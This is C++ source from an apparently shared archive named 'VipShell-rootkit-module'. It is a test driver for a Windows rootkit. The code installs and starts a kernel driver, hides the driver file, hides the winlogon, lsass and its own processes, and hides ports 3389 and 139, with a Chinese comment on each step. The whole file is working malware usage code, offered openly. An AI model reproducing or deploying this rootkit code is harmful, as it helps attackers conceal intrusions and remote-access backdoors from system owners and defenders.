VipShell-rootkit-module.rar WinTest.cpp

www.pudn.com > VipShell-rootkit-module.rar > WinTest.cpp
#include "PinboardInterface.h" 
#include  
#include  
#include  
#pragma comment (lib, "Psapi.lib") 
 
DWORD GetProcessIdByName(LPCTSTR szName) 
{ 
	DWORD dwRet = 0; 
    HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); 
    PROCESSENTRY32 pe32; 
    pe32.dwSize = sizeof( PROCESSENTRY32 ); 
    Process32First( hSnapshot, &pe32 ); 
    do 
	{ 
 
		if ( _tcsicmp(pe32.szExeFile, szName) == 0) 
		{ 
			dwRet = pe32.th32ProcessID; 
			break; 
		} 
 
 
    } while ( Process32Next( hSnapshot, &pe32 ) ); 
    CloseHandle( hSnapshot ); 
	return dwRet; 
} 
 
void main() 
{ 
	CPinboardPtr spRootKitModule = CreatePinboardInstance(RootKitModule); 
	spRootKitModule->Test();   //测试接口 
	spRootKitModule->CreateDriver("c:\\__ZHF__ROORKIT.SYS", "ZfjRootkit"); 
	spRootKitModule->StartDriver();  //启动驱动 
	spRootKitModule->AddHideFile("__ZHF__roorkit.SYS"); //隐藏这个文件 
	spRootKitModule->AddHideProcessId( GetProcessIdByName("WINLOGON.EXE")); //隐藏WINLOGON.EXE 进程 
	spRootKitModule->AddHideProcessId( GetProcessIdByName("lsass.EXE")); //隐藏lass.EXE 进程 
	spRootKitModule->AddHideProcessId( GetCurrentProcessId() ); //隐藏自己的 进程 
	spRootKitModule->AddHidePort(3389);  //隐藏3389 
	spRootKitModule->AddHidePort(139);  //隐藏139 
	spRootKitModule->StartHideFile();  //开始隐藏文件 
	spRootKitModule->StartHidePort();  //开始隐port 
	spRootKitModule->StartHideProcess();  //隐藏进程 
}